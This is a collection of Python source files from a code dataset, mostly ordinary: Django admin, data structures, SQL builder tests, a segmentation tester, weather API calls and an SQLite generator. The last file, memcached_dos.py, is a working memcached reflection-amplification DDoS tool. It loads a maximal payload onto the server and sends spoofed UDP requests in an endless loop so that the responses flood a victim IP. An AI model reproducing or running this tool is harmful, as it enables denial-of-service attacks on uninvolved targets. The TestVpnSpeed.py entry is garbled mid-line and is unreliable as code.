+{"seq_id":"318476284","text":"# # coding=utf-8\n# # author: dlyapun\n\nfrom django.contrib import admin\nfrom my_target.models import *\n\n\nclass MyTargetCampaignAdmin(admin.ModelAdmin):\n list_display = ('campaign_id',\n 'name',\n 'status',\n 'created',\n 'price_per_show',\n 'price_per_click',\n 'budget_limit_day',\n 'budget_limit')\n\n\nclass MyTargetBannerAdmin(admin.ModelAdmin):\n list_display = ('banner_id',\n 'status',\n 'created',\n 'moderation_status',\n 'title',\n 'clicks',\n 'shows',\n 'amount',\n 'ctr',\n 'uniques',\n 'uniques_increment')\n\n\nclass MyTargetAgencyClientAdmin(admin.ModelAdmin):\n list_display = ('username',\n 'client_name',\n 'status',\n 'client_id',\n 'balance',\n 'acc_type',)\n\n\nadmin.site.register(MyTargetCampaign, MyTargetCampaignAdmin)\nadmin.site.register(MyTargetBanner, MyTargetBannerAdmin)\nadmin.site.register(MyTargetAgencyClient, MyTargetAgencyClientAdmin)","sub_path":"my_target/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"534038131","text":"## TestVPNspeed\n## \n# 1. download html source from url\n# 2. parse ip address of pages and stone in sets\n# 3. ping the ip address, get delay time\n# 4. return minial ip\n\nimport urllib2\nimport re\nimport time\nimport os\n\nurl = 'https://www.51vpnn.net/server/query'\n\nr_ip_addr = '(? /Users/tujiankun/Desktop/1.txt'\n os.system(cmd)\n parse_speed(ip)\n\n os.system('rm 1.txt')\n\n\n\n","sub_path":"TestVpnSpeed.py","file_name":"TestVpnSpeed.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"414854155","text":"import NodoSemestre;\nclass ListaDoble:\n def __init__(self):\n self.primero=None;\n self.ultimo=None;\n self.arbolCurso=None\n\n def insertar(self,dato,dato2):\n nuevo = NodoSemestre.Nodo(dato,dato2)\n if(self.primero ==None):\n self.primero = nuevo;\n self.ultimo =self.primero;\n else:\n nuevo.atras = self.ultimo\n self.ultimo.siguiente = nuevo\n self.ultimo = nuevo \n \n \n \n \n \n \n def eliminar(self,dato):\n actual = self.primero\n eliminado =False;\n if(actual is None):\n eliminado =False;\n elif(actual.dato==dato):\n self.primero=actual.siguiente\n self.primero.antras =None\n eliminado =True\n elif( self.ultimo.dato ==dato):\n self.ultimo=self.ultimo.antras\n self.ultimo.siguiente=None\n eliminado=True\n else:\n while actual:\n if(actual.dato==dato):\n actual.atras.siguiente = actual.siguiente\n actual.siguiente.atras = actual.atras\n eliminado=True\n actual =actual.siguiente\n \n\n\n \n def buscar(self,dato):\n aux = self.primero\n if(aux != None):\n while(aux!=None):\n if(dato == aux.dato):\n self.arbolCurso=aux.dato2\n return aux.dato\n aux = aux.siguiente;\n else:\n print(\"la lista se encuentra vacia\") \n\n def recorrer(self):\n aux = self.primero\n if(aux != None):\n while(aux!=None):\n print(aux.dato)\n aux.dato2.print_tree(aux.dato2.root)\n aux = aux.siguiente;\n else:\n print(\"la lista se encuentra vacia\") \n\n\n\n \n \n \n\n \n","sub_path":"FASE2/PROYECTO/APLICACION/ListaSemestre.py","file_name":"ListaSemestre.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"423934764","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2011-2016, Cédric Krier\n# Copyright (c) 2011-2016, B2CK\n# Copyright (c) 2016-2016, Victor Uriarte\n# and contributors. See AUTHORS for more details.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nfrom sql import Literal, With\n\n\ndef test_update1(table):\n query = table.update([table.c], ['foo'])\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s'\n assert query.params == ('foo',)\n\n query.where = (table.b == Literal(True))\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s WHERE (\"t\".\"b\" = %s)'\n assert query.params == ('foo', True)\n\n\ndef test_update2(t1, t2):\n query = t1.update([t1.c], ['foo'], from_=[t2], where=(t1.c == t2.c))\n assert str(query) == ('UPDATE \"t1\" AS \"b\" SET \"c\" = %s '\n 'FROM \"t2\" AS \"a\" WHERE (\"b\".\"c\" = \"a\".\"c\")')\n assert query.params == ('foo',)\n\n\ndef test_update_subselect(t1, t2):\n query_list = t1.update([t1.c], [t2.select(t2.c, where=t2.i == t1.i)])\n query_nolist = t1.update([t1.c], t2.select(t2.c, where=t2.i == t1.i))\n for query in [query_list, query_nolist]:\n assert str(query) == ('UPDATE \"t1\" SET \"c\" = '\n '(SELECT \"b\".\"c\" FROM \"t2\" AS \"b\" '\n 'WHERE (\"b\".\"i\" = \"t1\".\"i\"))')\n assert query.params == ()\n\n\ndef test_update_returning(table):\n query = table.update([table.c], ['foo'], returning=[table.c])\n assert str(query) == 'UPDATE \"t\" SET \"c\" = %s RETURNING \"t\".\"c\"'\n assert query.params == ('foo',)\n\n\ndef test_with(table, t1):\n w = With(query=t1.select(t1.c1))\n\n query = table.update([table.c2], with_=[w],\n values=[w.select(w.c3, where=w.c4 == 2)])\n assert str(query) == ('WITH \"b\" AS '\n '(SELECT \"c\".\"c1\" FROM \"t1\" AS \"c\") '\n 'UPDATE \"t\" SET \"c2\" = '\n '(SELECT \"b\".\"c3\" FROM \"b\" AS \"b\" '\n 'WHERE (\"b\".\"c4\" = %s))')\n assert query.params == (2,)\n","sub_path":"tests/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"123182117","text":"# -- coding: utf-8 --\n'''\n该模块是自己手工创建并且维护,可能会遇到很多问题,后面会持续维护\n'''\nimport sys,os\n#将文\ndef output(content,fileName):\n\troot_dir \t= os.getcwd() \t\t\t\t\t\t\t#程序的根目录\n\tfile_add\t= os.path.join(root_dir,'output',fileName) #该出妙在不用人工判断不同平台,比如是Windows还是Linux,程序可以自己判断\n\tfile \t\t= open(file_add,'a+')\n\tfile.write(str(content) + \"\\n\")\n\tfile.close()","sub_path":"module/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"330164638","text":"from sklearn import datasets\nimport pystan\ndef stan():\n iris = datasets.load_iris()\n X = iris.data[:, :2] # we only take the first two features.\n y = iris.target\n model_code = \"\"\"\n data {\n int K;\n int N;\n int D;\n int y[N];\n vector[D] x[N];\n }\n parameters {\n matrix[K,D] beta;\n }\n model {\n for (k in 1:K)\n beta[k] ~ normal(0, 5);\n for (n in 1:N)\n y[n] ~ categorical(softmax(beta * x[n]));\n }\n\"\"\"\n iris_data = {'N': len(X),\n 'D': 2,\n 'K': 3,\n 'x': X,\n 'y': y}\n sm = pystan.StanModel(model_code=model_code)\n return sm, iris_data\n","sub_path":"ml/ex/stn.py","file_name":"stn.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"46400927","text":"'''\nFunction:\n Implementation of Tester\nAuthor:\n Zhenchao Jin\n'''\nimport os\nimport cv2\nimport copy\nimport torch\nimport pickle\nimport warnings\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributed as dist\nfrom tqdm import tqdm\nfrom configs import BuildConfig\nfrom modules import (\n BuildDataset, BuildDistributedDataloader, BuildDistributedModel, BuildLoss, BuildBackbone, BuildSegmentor, BuildPixelSampler, \n Logger, initslurm, setrandomseed, touchdir, loadckpts, saveckpts, BuildOptimizer, BuildScheduler\n)\nwarnings.filterwarnings('ignore')\n\n\n'''parse arguments in command line'''\ndef parsecmdargs():\n parser = argparse.ArgumentParser(description='SSSegmentation is an open source supervised semantic segmentation toolbox based on PyTorch')\n parser.add_argument('--local_rank', dest='local_rank', help='node rank for distributed testing', default=0, type=int)\n parser.add_argument('--nproc_per_node', dest='nproc_per_node', help='number of process per node', default=8, type=int)\n parser.add_argument('--cfgfilepath', dest='cfgfilepath', help='config file path you want to use', type=str, required=True)\n parser.add_argument('--evalmode', dest='evalmode', help='evaluate mode, support online and offline', default='offline', type=str)\n parser.add_argument('--ckptspath', dest='ckptspath', help='checkpoints you want to resume from', type=str, required=True)\n parser.add_argument('--slurm', dest='slurm', help='please add --slurm if you are using slurm', default=False, action='store_true')\n args = parser.parse_args()\n if args.slurm: initslurm(args, '28000')\n return args\n\n\n'''Tester'''\nclass Tester():\n def __init__(self, cfg, ngpus_per_node, logger_handle, cmd_args, cfg_file_path):\n # set attribute\n self.cfg = cfg\n self.ngpus_per_node = ngpus_per_node\n self.logger_handle = logger_handle\n self.cmd_args = cmd_args\n self.cfg_file_path = cfg_file_path\n assert torch.cuda.is_available(), 'cuda is not available'\n # init distributed training\n dist.init_process_group(backend=self.cfg.SEGMENTOR_CFG.get('backend', 'nccl'))\n # open full fp32\n torch.backends.cuda.matmul.allow_tf32 = False\n torch.backends.cudnn.allow_tf32 = False\n '''start tester'''\n def start(self, all_preds, all_gts):\n cfg, ngpus_per_node, logger_handle, cmd_args, cfg_file_path = self.cfg, self.ngpus_per_node, self.logger_handle, self.cmd_args, self.cfg_file_path\n rank_id = int(os.environ['SLURM_PROCID']) if 'SLURM_PROCID' in os.environ else cmd_args.local_rank\n # build dataset and dataloader\n dataset = BuildDataset(mode='TEST', logger_handle=logger_handle, dataset_cfg=cfg.SEGMENTOR_CFG['dataset'])\n assert dataset.num_classes == cfg.SEGMENTOR_CFG['num_classes'], 'parsed config file %s error' % cfg_file_path\n dataloader_cfg = copy.deepcopy(cfg.SEGMENTOR_CFG['dataloader'])\n expected_total_train_bs_for_assert = dataloader_cfg.pop('expected_total_train_bs_for_assert')\n dataloader_cfg['train']['batch_size'], dataloader_cfg['train']['num_workers'] = dataloader_cfg['train'].pop('batch_size_per_gpu'), dataloader_cfg['train'].pop('num_workers_per_gpu')\n dataloader_cfg['test']['batch_size'], dataloader_cfg['test']['num_workers'] = dataloader_cfg['test'].pop('batch_size_per_gpu'), dataloader_cfg['test'].pop('num_workers_per_gpu')\n assert expected_total_train_bs_for_assert == dataloader_cfg['train']['batch_size'] * ngpus_per_node\n dataloader = BuildDistributedDataloader(dataset=dataset, dataloader_cfg=dataloader_cfg['test'])\n # build segmentor\n cfg.SEGMENTOR_CFG['backbone']['pretrained'] = False\n segmentor = BuildSegmentor(segmentor_cfg=copy.deepcopy(cfg.SEGMENTOR_CFG), mode='TEST')\n torch.cuda.set_device(cmd_args.local_rank)\n segmentor.cuda(cmd_args.local_rank)\n # load ckpts\n ckpts = loadckpts(cmd_args.ckptspath)\n try:\n segmentor.load_state_dict(ckpts['model'])\n except Exception as e:\n logger_handle.warning(str(e) + '\\n' + 'Try to load ckpts by using strict=False')\n segmentor.load_state_dict(ckpts['model'], strict=False)\n # parallel\n segmentor = BuildDistributedModel(segmentor, {'device_ids': [cmd_args.local_rank]})\n # print information\n if (cmd_args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n logger_handle.info(f'Config file path: {cfg_file_path}')\n logger_handle.info(f'Config details: \\n{cfg.SEGMENTOR_CFG}')\n logger_handle.info(f'Resume from: {cmd_args.ckptspath}')\n # set eval\n segmentor.eval()\n # start to test\n FloatTensor = torch.cuda.FloatTensor\n inference_cfg = copy.deepcopy(cfg.SEGMENTOR_CFG['inference'])\n with torch.no_grad():\n dataloader.sampler.set_epoch(0)\n pbar = tqdm(enumerate(dataloader))\n for batch_idx, samples_meta in pbar:\n pbar.set_description('Processing %s/%s in rank %s' % (batch_idx+1, len(dataloader), rank_id))\n imageids, images, widths, heights, gts = samples_meta['id'], samples_meta['image'], samples_meta['width'], samples_meta['height'], samples_meta['seg_target']\n infer_tricks, align_corners = inference_cfg['tricks'], segmentor.module.align_corners\n cascade_cfg = infer_tricks.get('cascade', {'key_for_pre_output': 'memory_gather_logits', 'times': 1, 'forward_default_args': None})\n for idx in range(cascade_cfg['times']):\n forward_args = None\n if idx > 0: \n outputs_list = [\n F.interpolate(outputs, size=outputs_list[-1].shape[2:], mode='bilinear', align_corners=align_corners) for outputs in outputs_list\n ]\n forward_args = {cascade_cfg['key_for_pre_output']: sum(outputs_list) / len(outputs_list)}\n if cascade_cfg['forward_default_args'] is not None: \n forward_args.update(cascade_cfg['forward_default_args'])\n outputs_list = self.auginference(\n segmentor=segmentor,\n images=images,\n inference_cfg=inference_cfg,\n num_classes=dataset.num_classes,\n FloatTensor=FloatTensor,\n align_corners=align_corners,\n forward_args=forward_args,\n )\n for idx in range(len(outputs_list[0])):\n output = [\n F.interpolate(outputs[idx: idx+1], size=(heights[idx], widths[idx]), mode='bilinear', align_corners=align_corners) for outputs in outputs_list\n ]\n output = sum(output) / len(output)\n pred = (torch.argmax(output[0], dim=0)).cpu().numpy().astype(np.int32)\n all_preds.append([imageids[idx], pred])\n gt = gts[idx].cpu().numpy().astype(np.int32)\n gt[gt >= dataset.num_classes] = -1\n all_gts.append(gt)\n '''inference with augmentations'''\n def auginference(self, segmentor, images, inference_cfg, num_classes, FloatTensor, align_corners, forward_args=None):\n infer_tricks, outputs_list = inference_cfg['tricks'], []\n for scale_factor in infer_tricks['multiscale']:\n images_scale = F.interpolate(images, scale_factor=scale_factor, mode='bilinear', align_corners=align_corners)\n outputs = self.inference(\n segmentor=segmentor, \n images=images_scale.type(FloatTensor), \n inference_cfg=inference_cfg, \n num_classes=num_classes, \n forward_args=forward_args,\n ).cpu()\n outputs_list.append(outputs)\n if infer_tricks['flip']:\n images_flip = torch.from_numpy(np.flip(images_scale.cpu().numpy(), axis=3).copy())\n outputs_flip = self.inference(\n segmentor=segmentor, \n images=images_flip.type(FloatTensor), \n inference_cfg=inference_cfg, \n num_classes=num_classes, \n forward_args=forward_args,\n )\n fixed_seg_target_pairs = inference_cfg.get('fixed_seg_target_pairs', None)\n if fixed_seg_target_pairs is None:\n for data_pipeline in self.cfg.SEGMENTOR_CFG['dataset']['train']['data_pipelines']:\n if 'RandomFlip' in data_pipeline: \n fixed_seg_target_pairs = data_pipeline[-1].get('fixed_seg_target_pairs', None)\n if fixed_seg_target_pairs is not None:\n outputs_flip_clone = outputs_flip.data.clone()\n for (pair_a, pair_b) in fixed_seg_target_pairs:\n outputs_flip[:, pair_a, :, :] = outputs_flip_clone[:, pair_b, :, :]\n outputs_flip[:, pair_b, :, :] = outputs_flip_clone[:, pair_a, :, :]\n outputs_flip = torch.from_numpy(np.flip(outputs_flip.cpu().numpy(), axis=3).copy()).type_as(outputs)\n outputs_list.append(outputs_flip)\n return outputs_list\n '''inference'''\n def inference(self, segmentor, images, inference_cfg, num_classes, forward_args=None):\n assert inference_cfg['mode'] in ['whole', 'slide']\n use_probs_before_resize = inference_cfg['tricks']['use_probs_before_resize']\n if inference_cfg['mode'] == 'whole':\n if forward_args is None:\n outputs = segmentor(images)\n else:\n outputs = segmentor(images, **forward_args)\n if use_probs_before_resize:\n outputs = F.softmax(outputs, dim=1)\n else:\n align_corners = segmentor.module.align_corners\n opts = inference_cfg['opts']\n stride_h, stride_w = opts['stride']\n cropsize_h, cropsize_w = opts['cropsize']\n batch_size, _, image_h, image_w = images.size()\n num_grids_h = max(image_h - cropsize_h + stride_h - 1, 0) // stride_h + 1\n num_grids_w = max(image_w - cropsize_w + stride_w - 1, 0) // stride_w + 1\n outputs = images.new_zeros((batch_size, num_classes, image_h, image_w))\n count_mat = images.new_zeros((batch_size, 1, image_h, image_w))\n for h_idx in range(num_grids_h):\n for w_idx in range(num_grids_w):\n x1, y1 = w_idx * stride_w, h_idx * stride_h\n x2, y2 = min(x1 + cropsize_w, image_w), min(y1 + cropsize_h, image_h)\n x1, y1 = max(x2 - cropsize_w, 0), max(y2 - cropsize_h, 0)\n crop_images = images[:, :, y1:y2, x1:x2]\n if forward_args is None:\n outputs_crop = segmentor(crop_images)\n else:\n outputs_crop = segmentor(crop_images, **forward_args)\n outputs_crop = F.interpolate(outputs_crop, size=crop_images.size()[2:], mode='bilinear', align_corners=align_corners)\n if use_probs_before_resize: \n outputs_crop = F.softmax(outputs_crop, dim=1)\n outputs += F.pad(outputs_crop, (int(x1), int(outputs.shape[3] - x2), int(y1), int(outputs.shape[2] - y2)))\n count_mat[:, :, y1:y2, x1:x2] += 1\n assert (count_mat == 0).sum() == 0\n outputs = outputs / count_mat\n return outputs\n\n\n'''main'''\ndef main():\n # parse arguments\n args = parsecmdargs()\n cfg, cfg_file_path = BuildConfig(args.cfgfilepath)\n # touch work dir\n touchdir(cfg.SEGMENTOR_CFG['work_dir'])\n # initialize logger_handle\n logger_handle = Logger(cfg.SEGMENTOR_CFG['logfilepath'])\n # number of gpus, for distribued testing, only support a process for a GPU\n ngpus_per_node = torch.cuda.device_count()\n if ngpus_per_node != args.nproc_per_node:\n if (args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n logger_handle.warning('ngpus_per_node is not equal to nproc_per_node, force ngpus_per_node = nproc_per_node by default')\n ngpus_per_node = args.nproc_per_node\n # instanced Tester\n all_preds, all_gts = [], []\n client = Tester(cfg=cfg, ngpus_per_node=ngpus_per_node, logger_handle=logger_handle, cmd_args=args, cfg_file_path=cfg_file_path)\n client.start(all_preds, all_gts)\n # save results and evaluate\n rank_id = int(os.environ['SLURM_PROCID']) if 'SLURM_PROCID' in os.environ else args.local_rank\n work_dir = cfg.SEGMENTOR_CFG['work_dir']\n filename = cfg.SEGMENTOR_CFG['resultsavepath'].split('/')[-1].split('.')[0] + f'_{rank_id}.' + cfg.SEGMENTOR_CFG['resultsavepath'].split('.')[-1]\n with open(os.path.join(work_dir, filename), 'wb') as fp:\n pickle.dump([all_preds, all_gts], fp)\n rank = torch.tensor([rank_id], device='cuda')\n rank_list = [rank.clone() for _ in range(args.nproc_per_node)]\n dist.all_gather(rank_list, rank)\n logger_handle.info('Rank %s finished' % int(rank.item()))\n if (args.local_rank == 0) and (int(os.environ.get('SLURM_PROCID', 0)) == 0):\n all_preds_gather, all_gts_gather = [], []\n for rank in rank_list:\n rank = str(int(rank.item()))\n filename = cfg.SEGMENTOR_CFG['resultsavepath'].split('/')[-1].split('.')[0] + f'_{rank}.' + cfg.SEGMENTOR_CFG['resultsavepath'].split('.')[-1]\n fp = open(os.path.join(work_dir, filename), 'rb')\n all_preds, all_gts = pickle.load(fp)\n all_preds_gather += all_preds\n all_gts_gather += all_gts\n all_preds, all_gts = all_preds_gather, all_gts_gather\n all_preds_filtered, all_gts_filtered, all_ids = [], [], []\n for idx, pred in enumerate(all_preds):\n if pred[0] in all_ids: \n continue\n all_ids.append(pred[0])\n all_preds_filtered.append(pred[1])\n all_gts_filtered.append(all_gts[idx])\n all_preds, all_gts = all_preds_filtered, all_gts_filtered\n logger_handle.info('All Finished, all_preds: %s, all_gts: %s' % (len(all_preds), len(all_gts)))\n dataset = BuildDataset(mode='TEST', logger_handle=logger_handle, dataset_cfg=cfg.SEGMENTOR_CFG['dataset'])\n if args.evalmode == 'offline':\n result = dataset.evaluate(\n seg_preds=all_preds, \n seg_targets=all_gts, \n metric_list=cfg.SEGMENTOR_CFG['inference'].get('metric_list', ['iou', 'miou']),\n num_classes=cfg.SEGMENTOR_CFG['num_classes'],\n ignore_index=-1,\n )\n logger_handle.info(result)\n else:\n dataset.formatresults(all_preds, all_ids, savedir=os.path.join(work_dir, 'results'))\n\n\n'''debug'''\nif __name__ == '__main__':\n with torch.no_grad():\n main()","sub_path":"ssseg/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":15150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"431657946","text":"import os\nimport wget\nimport json\n\n# {lat,lon} 36.2072735, -79.8184574\ndef construct_url(type, coords):\n url = \"https://api.weather.gov/\"\n url = f\"{url}{type}/{coords[0]},{coords[1]}\"\n print(url)\n return url\n\ndef url_request(url, coords):\n filename = wget.download(url, out=f\"weatherpoint_{coords[0]}_{coords[1]}\")\n return filename\n\n\ncoords = [36.2072735,-79.8184574]\nurl = construct_url(\"points\", coords)\nfilename = url_request(url, coords)\n\n\nwith open(filename) as f:\n data = json.load(f)\n\nprint(json.dumps(data, indent = 4, sort_keys=True))\nprint(\"____________________________\")\nzone = data['properties']['forecast']\nprint(zone)\n\nfilename_grid = wget.download(zone, out=\"gridforcast\")\n","sub_path":"Research Work/Weather/calls.py","file_name":"calls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"380403634","text":"import random\nimport sqlite3\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Type, Union\n\nfrom loguru import logger\nfrom lorem_text import lorem\n\nrandom.seed(420)\n\n# Source: https://github.com/smashew/NameDatabases\nthis_folder = Path(__file__).parent\nwith (this_folder / 'first_names.txt').open() as f:\n first_names = [i.strip() for i in f.readlines()]\nwith (this_folder / 'last_names.txt').open() as f:\n last_names = [i.strip() for i in f.readlines()]\n\n\ndef generate_name() -> str:\n first = random.randint(0, len(first_names))\n last = random.randint(0, len(last_names))\n first_name = first_names[first]\n last_name = last_names[last]\n return f'{first_name} {last_name}'\n\n\ndef generate_int() -> int:\n return random.randint(1000, 2_000_000)\n\n\ndef generate_float() -> float:\n return random.uniform(1000, 2_000_000)\n\n\ndef generate_year() -> int:\n return random.randint(1980, 1999)\n\n\ndef generate_bool() -> bool:\n return bool(random.randint(0, 1))\n\n\ndef generate_text() -> str:\n return lorem.words(2)\n\n\nclass SqlMetaclass:\n @classmethod\n def create_table(cls, db: sqlite3.Connection):\n \"\"\"\n a = A()\n a.create_table(db)\n \"\"\"\n database_column_types = {\n str: 'TEXT',\n int: 'INT',\n float: 'REAL',\n bool: 'BOOLEAN',\n }\n columns = [\n f'{column_name} {database_column_types[column_type]}'\n for column_name, column_type in cls.__annotations__.items()\n ]\n columns_joined = ', '.join(columns)\n logger.info(f'Creating table {cls.__name__} with columns ({columns_joined})')\n db.execute(f\"\"\"\n CREATE TABLE {cls.__name__} ({columns_joined})\n \"\"\")\n # db.commit()\n\n @classmethod\n def generate_data(cls, db: sqlite3.Connection, amount: int = 1):\n name_fields = {'artist_name'}\n rows: List[List[Union[float, bool, str]]] = []\n # TODO Overlapping items\n for _ in range(amount):\n row_entry: List[Union[float, bool, str]] = []\n for column_name, column_type in cls.__annotations__.items():\n if column_name in name_fields:\n row_entry.append(generate_name())\n elif 'year' in column_name:\n row_entry.append(generate_year())\n elif column_type == str:\n row_entry.append(generate_text())\n elif column_type == int:\n row_entry.append(generate_int())\n elif column_type == float:\n row_entry.append(generate_float())\n elif column_type == bool:\n row_entry.append(generate_bool())\n else:\n raise TypeError(f'Column type must be one of: str, int, float, but was of type {column_type}')\n rows.append(row_entry)\n columns = [f'{column_name}' for column_name, column_type in cls.__annotations__.items()]\n columns_joined = ', '.join(columns)\n values_questionmarks = ','.join('?' for _ in columns)\n logger.info(f\"Inserting the following rows into table '{cls.__name__}':\")\n for row in rows:\n logger.info(f'{row}')\n db.executemany(\n f\"\"\"\n INSERT INTO {cls.__name__} ({columns_joined})\n VALUES ({values_questionmarks})\n \"\"\",\n rows,\n )\n\n def add_item_to_db(self, db: sqlite3.Connection):\n columns = [f'{column_name}' for column_name, column_type in self.__annotations__.items()]\n columns_joined = ', '.join(columns)\n values = [self.__dict__[column_name] for column_name in columns]\n values_joined = ', '.join(map(repr, values))\n table_name = self.__class__.__name__\n insert_string = f\"\"\"\n INSERT INTO {table_name} ({columns_joined})\n VALUES ({values_joined})\n \"\"\"\n logger.info(f\"Inserting: values '{values_joined}' into columns '{columns_joined}' into table '{table_name}'\")\n db.execute(insert_string)\n\n # @classmethod\n # def print_table(cls, db: sqlite3.Connection):\n # pass\n\n\n# Define tables\n\n\n@dataclass\nclass Song(SqlMetaclass):\n song_id: int\n song_name: str\n artist_id: int\n album_id: int\n genre: str\n song_length: int\n\n\n@dataclass\nclass Album(SqlMetaclass):\n album_id: int\n album_name: str\n publish_year: int\n\n\n@dataclass\nclass Artist(SqlMetaclass):\n artist_id: int\n artist_name: str\n birth_year: int\n verified: bool\n\n\nif __name__ == '__main__':\n with sqlite3.connect(':memory:') as db:\n cls: Type[SqlMetaclass]\n for cls in [Song, Album, Artist]:\n # Create tables\n cls.create_table(db)\n # Generate data\n cls.generate_data(db, amount=3)\n\n # Add custom items to db\n Song(\n song_id=generate_int(),\n song_name=generate_name(),\n artist_id=generate_int(),\n album_id=1869690,\n genre=generate_text(),\n song_length=generate_int(),\n ).add_item_to_db(db)\n\n # Print data in database\n # TODO print data as table where each column has same width\n result = db.execute('SELECT * FROM Song')\n for i in result:\n # logger.info(Song(*i))\n pass\n\n # Run test query\n result = db.execute(\n \"\"\"\n SELECT song_name, album_name, publish_year FROM Song JOIN Album\n ON Song.album_id = Album.album_id\n \"\"\",\n )\n result_list = list(map(list, result))\n\n # Compare result to expected\n expected = [['Jeannette Macha', 'doloribus unde', 1984]]\n assert result_list == expected, f'{result_list} != {expected}'\n","sub_path":"example_package/burny_test_template/SQL_tester.py","file_name":"SQL_tester.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"386978667","text":"#!/usr/bin/env python3.7\n# -*- coding:utf-8 -*-\nimport click\nimport socket\nimport memcache\nimport random\n\nfrom scapy.all import UDP, IP, send\n\n\nmemcached_ip = None\nmemcached_port = None\n\n\n@click.group()\n@click.option(\"--server-ip\", required=True, type=str, help=\"set memcached ip\")\n@click.option(\"--server-port\", default=11211, type=int, help=\"set memcached port\")\ndef commands(server_ip, server_port):\n global memcached_ip, memcached_port\n memcached_ip = str(server_ip)\n memcached_port = int(server_port)\n click.echo(\"[*] memcached ip = %s\"%memcached_ip)\n click.echo(\"[*] memcached port = %d\"%memcached_port)\n\n\n@commands.command()\ndef setpayload():\n client = memcache.Client([\"%s:%d\"%(memcached_ip, memcached_port)])\n\n max_len = 0\n block = 1 << 10\n while True:\n indent = 1\n while True:\n temp_len = max_len + block*indent\n client.set(\"payload\", \"*\"*temp_len)\n saved_data = client.get(\"payload\")\n if saved_data is None or len((saved_data)) != temp_len:\n indent >>= 1\n break\n indent <<= 1\n max_len += block*indent\n block >>= 1\n if 0==block:\n block = 1\n if 0==indent and 1==block:\n break\n\n client.set(\"payload\", \"*\"*max_len)\n click.echo(\"[*] set payload success, data max length = %d\"%len(client.get(\"payload\")))\n\n\n@commands.command()\n@click.option(\"--target-ip\", \"-tip\", required=True, type=str, help=\"set target ip\")\ndef attack(target_ip):\n click.echo(\"[*] target ip = %s\"%target_ip)\n # data 前置8字节头,来自https://github.com/memcached/memcached/blob/master/doc/protocol.txt,\n # The frame header is 8 bytes long, as follows (all values are 16-bit integers\n # in network byte order, high byte first):\n # 0-1 Request ID\n # 2-3 Sequence number\n # 4-5 Total number of datagrams in this message\n # 6-7 Reserved for future use; must be 0\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00get payload\\r\\n\"\n udp_header = UDP(dport=memcached_port, sport=random.randint(10000, 60000))\n ip_header = IP(dst=memcached_ip, src=target_ip)\n pkt=ip_header/udp_header/data\n send(pkt, loop=1)\n\n\nif __name__ == \"__main__\":\n commands()\n\n","sub_path":"memcached_dos/memcached_dos.py","file_name":"memcached_dos.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
